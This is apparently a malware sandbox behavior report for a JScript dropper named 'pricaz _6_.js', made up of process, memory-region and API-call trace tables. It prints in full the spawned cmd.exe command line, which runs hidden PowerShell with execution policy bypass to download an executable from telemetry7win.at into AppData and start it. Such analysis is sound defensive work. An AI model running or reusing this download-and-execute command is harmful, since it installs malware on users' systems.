f664d5e8a47084388e3d0efabc38b5f04a759e382211846f722be6f7365df7fc (SHA256)
pricaz _6_.js
JScript
Created at 2018-02-28 11:58:00
Monitored Processes
Behavior Information - Sequential View
Process #1: cscript.exe
80
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\windows\system32\cscript.exe |
| Command Line | "C:\Windows\System32\CScript.exe" "C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:37, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0x3c4 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
788
0x
81C
0x
A24
0x
A4C
0x
AD8
0x
B18
0x
B28
0x
B6C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x00000084c3ad0000 | 0x84c3ad0000 | 0x84c3aeffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c3ad0000 | 0x84c3ad0000 | 0x84c3adffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c3ae0000 | 0x84c3ae0000 | 0x84c3ae6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c3af0000 | 0x84c3af0000 | 0x84c3afefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000084c3b00000 | 0x84c3b00000 | 0x84c3bfffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c3c00000 | 0x84c3c00000 | 0x84c3c03fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c3c10000 | 0x84c3c10000 | 0x84c3c10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000084c3c20000 | 0x84c3c20000 | 0x84c3c21fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x84c3c30000 | 0x84c3cadfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000084c3cb0000 | 0x84c3cb0000 | 0x84c3cb6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c3cc0000 | 0x84c3cc0000 | 0x84c3cc2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c3cd0000 | 0x84c3cd0000 | 0x84c3cd0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c3ce0000 | 0x84c3ce0000 | 0x84c3ce0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c3cf0000 | 0x84c3cf0000 | 0x84c3cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
| rpcss.dll | 0x84c3d00000 | 0x84c3db7fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000084c3d00000 | 0x84c3d00000 | 0x84c3d00fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c3d00000 | 0x84c3d00000 | 0x84c3d03fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000084c3d10000 | 0x84c3d10000 | 0x84c3d16fff | Private Memory | Readable, Writable |
|
|
|
- |
| cscript.exe | 0x84c3d20000 | 0x84c3d31fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000084c3d40000 | 0x84c3d40000 | 0x84c3d40fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c3d50000 | 0x84c3d50000 | 0x84c3d50fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c3d60000 | 0x84c3d60000 | 0x84c3d61fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000084c3d60000 | 0x84c3d60000 | 0x84c3d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c3d70000 | 0x84c3d70000 | 0x84c3d71fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| jscript.dll.mui | 0x84c3d70000 | 0x84c3d73fff | Memory Mapped File | Readable |
|
|
|
- |
| shell32.dll | 0x84c3d80000 | 0x84c3d90fff | Memory Mapped File | Readable |
|
|
|
- |
| stdole2.tlb | 0x84c3da0000 | 0x84c3da3fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000084c3db0000 | 0x84c3db0000 | 0x84c3db0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c3dc0000 | 0x84c3dc0000 | 0x84c3dcffff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x84c3dd0000 | 0x84c3dd3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000084c3de0000 | 0x84c3de0000 | 0x84c3edffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c3ee0000 | 0x84c3ee0000 | 0x84c402ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c3ee0000 | 0x84c3ee0000 | 0x84c3fd0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000022.db | 0x84c3fe0000 | 0x84c3ffcfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000084c4000000 | 0x84c4000000 | 0x84c4000fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x84c4010000 | 0x84c4013fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000084c4020000 | 0x84c4020000 | 0x84c402ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c4030000 | 0x84c4030000 | 0x84c403ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c4040000 | 0x84c4040000 | 0x84c41c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c41d0000 | 0x84c41d0000 | 0x84c4350fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c4360000 | 0x84c4360000 | 0x84c575ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000084c5760000 | 0x84c5760000 | 0x84c5b5bfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x84c5b60000 | 0x84c5e34fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000084c5e40000 | 0x84c5e40000 | 0x84c5f3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c5f40000 | 0x84c5f40000 | 0x84c603ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c6040000 | 0x84c6040000 | 0x84c703ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c7040000 | 0x84c7040000 | 0x84c713ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c7140000 | 0x84c7140000 | 0x84c723ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c7240000 | 0x84c7240000 | 0x84c733ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c7340000 | 0x84c7340000 | 0x84c743ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c7440000 | 0x84c7440000 | 0x84c753ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000084c7540000 | 0x84c7540000 | 0x84c763ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000006.db | 0x84c7640000 | 0x84c767efff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x84c7680000 | 0x84c7702fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000084c7710000 | 0x84c7710000 | 0x84c7710fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000084c7720000 | 0x84c7720000 | 0x84c7720fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00007ff65d5cc000 | 0x7ff65d5cc000 | 0x7ff65d5cdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d5ce000 | 0x7ff65d5ce000 | 0x7ff65d5cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00007ff65d5d0000 | 0x7ff65d5d0000 | 0x7ff65d6cffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff65d6d0000 | 0x7ff65d6d0000 | 0x7ff65d6f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00007ff65d6f3000 | 0x7ff65d6f3000 | 0x7ff65d6f4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d6f5000 | 0x7ff65d6f5000 | 0x7ff65d6f6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d6f7000 | 0x7ff65d6f7000 | 0x7ff65d6f8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d6f9000 | 0x7ff65d6f9000 | 0x7ff65d6fafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d6fb000 | 0x7ff65d6fb000 | 0x7ff65d6fcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d6fd000 | 0x7ff65d6fd000 | 0x7ff65d6fefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff65d6ff000 | 0x7ff65d6ff000 | 0x7ff65d6fffff | Private Memory | Readable, Writable |
|
|
|
- |
| cscript.exe | 0x7ff65e110000 | 0x7ff65e137fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| scrobj.dll | 0x7ffc633c0000 | 0x7ffc633f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x7ffc68c70000 | 0x7ffc68dcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x7ffc69060000 | 0x7ffc6906afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pcacli.dll | 0x7ffc6ae50000 | 0x7ffc6ae5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshext.dll | 0x7ffc6af20000 | 0x7ffc6af3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| jscript.dll | 0x7ffc6af40000 | 0x7ffc6affffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msisip.dll | 0x7ffc6b100000 | 0x7ffc6b10bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mpr.dll | 0x7ffc6b310000 | 0x7ffc6b32afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x7ffc6b4c0000 | 0x7ffc6b768fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x7ffc6b770000 | 0x7ffc6b99ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7ffc6d0e0000 | 0x7ffc6d0e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7ffc6d3f0000 | 0x7ffc6d554fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x7ffc6ed20000 | 0x7ffc6ed3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x7ffc6eef0000 | 0x7ffc6ef8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7ffc6f220000 | 0x7ffc6f2a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc6f2b0000 | 0x7ffc6f2b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7ffc6f2d0000 | 0x7ffc6f3f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7ffc6fa70000 | 0x7ffc6faa4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7ffc6fb80000 | 0x7ffc6fb9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7ffc6fe30000 | 0x7ffc6fe4dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x7ffc70060000 | 0x7ffc70085fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7ffc70350000 | 0x7ffc7037afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc70380000 | 0x7ffc703dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7ffc703e0000 | 0x7ffc703e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sxs.dll | 0x7ffc703f0000 | 0x7ffc70486fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7ffc70570000 | 0x7ffc70583fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x7ffc70620000 | 0x7ffc70631fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7ffc70640000 | 0x7ffc706e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc706f0000 | 0x7ffc70739fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x7ffc70740000 | 0x7ffc70916fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wintrust.dll | 0x7ffc70920000 | 0x7ffc7096bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ffc70970000 | 0x7ffc70a7ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7ffc70a80000 | 0x7ffc70ad0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7ffc70ae0000 | 0x7ffc70b84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7ffc70b90000 | 0x7ffc70c33fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x7ffc70c40000 | 0x7ffc70e15fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7ffc70e20000 | 0x7ffc72236fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7ffc72240000 | 0x7ffc72296fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ffc72310000 | 0x7ffc72449fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7ffc72450000 | 0x7ffc72594fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ffc725b0000 | 0x7ffc72656fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7ffc72660000 | 0x7ffc72693fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7ffc727c0000 | 0x7ffc72993fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7ffc729a0000 | 0x7ffc72b17fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7ffc72b20000 | 0x7ffc72c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7ffc72c60000 | 0x7ffc72d95fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7ffc72da0000 | 0x7ffc72e56fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x7ffc72e60000 | 0x7ffc72fd0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ffc73200000 | 0x7ffc733a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
Threads
Thread 0x788
79
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff65e110000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x7ffc72310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc72319180 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x7ffc72310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffc72313220 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\cscript.exe, process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 224, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 224, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 224, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 224, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 108 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\.JS |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\.JS, data = JSFile, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x7ffc729a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7ffc70c6cbe0 |
|
1 | |
| COM | Create | interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Environment | Get Environment String | name = JS_PROFILER |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 114125 |
|
2 | |
| File | Create | filename = C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, filename = C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, protection = PAGE_READONLY, maximum_size = 7000 |
|
1 | |
| Module | Map | C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\cscript.exe |
|
1 | |
| System | Get Info | type = System Directory |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffc70ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7ffc70b2ab80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7ffc70ae2b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7ffc70ae2a30 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, type = size |
|
1 | |
| File | Read | filename = C:\Users\5JGHKO~1\Desktop\PRICAZ~1.JS, size = 7000, size_out = 7000 |
|
1 | |
| COM | Create | interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7ffc70cc8580 |
|
1 | |
| System | Get Time | type = Ticks, time = 120984 |
|
1 | |
| System | Get Time | type = Ticks, time = 121031 |
|
1 | |
| COM | Get Class ID | cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.AppliCATion |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7ffc70c71148 |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 121125 |
|
2 | |
| Process | Create | process_name = Cmd.Exe, show_window = 570219809328 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x81c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Window | Create | class_name = WSH-Timer, wndproc_parameter = 570224237504 |
|
1 |
Process #3: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://telemetry7win.at/merry.rar?SOiJ','%ApPDaTa%eOX20.exe'); start-procEss '%appdaTa%eOX20.eXe' |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb70 |
| Parent PID | 0x36c (c:\windows\system32\cscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | FIVAUF\5JgHKoaOfdp |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x0000000a34a70000 | 0xa34a70000 | 0xa34a8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000a34a70000 | 0xa34a70000 | 0xa34a7ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000a34a80000 | 0xa34a80000 | 0xa34a86fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000a34a90000 | 0xa34a90000 | 0xa34a9efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000a34aa0000 | 0xa34aa0000 | 0xa34b9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000a34ba0000 | 0xa34ba0000 | 0xa34ba3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000a34bb0000 | 0xa34bb0000 | 0xa34bb0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000a34bc0000 | 0xa34bc0000 | 0xa34bc1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000a34c20000 | 0xa34c20000 | 0xa34d1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0xa34d20000 | 0xa34d9dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000a34f60000 | 0xa34f60000 | 0xa34f6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0xa34f70000 | 0xa35244fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00007ff652c20000 | 0x7ff652c20000 | 0x7ff652d1ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff652d20000 | 0x7ff652d20000 | 0x7ff652d42fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00007ff652d4d000 | 0x7ff652d4d000 | 0x7ff652d4efff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00007ff652d4f000 | 0x7ff652d4f000 | 0x7ff652d4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| cmd.exe | 0x7ff653b10000 | 0x7ff653b6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ffc70970000 | 0x7ffc70a7ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ffc72310000 | 0x7ffc72449fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ffc725b0000 | 0x7ffc72656fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
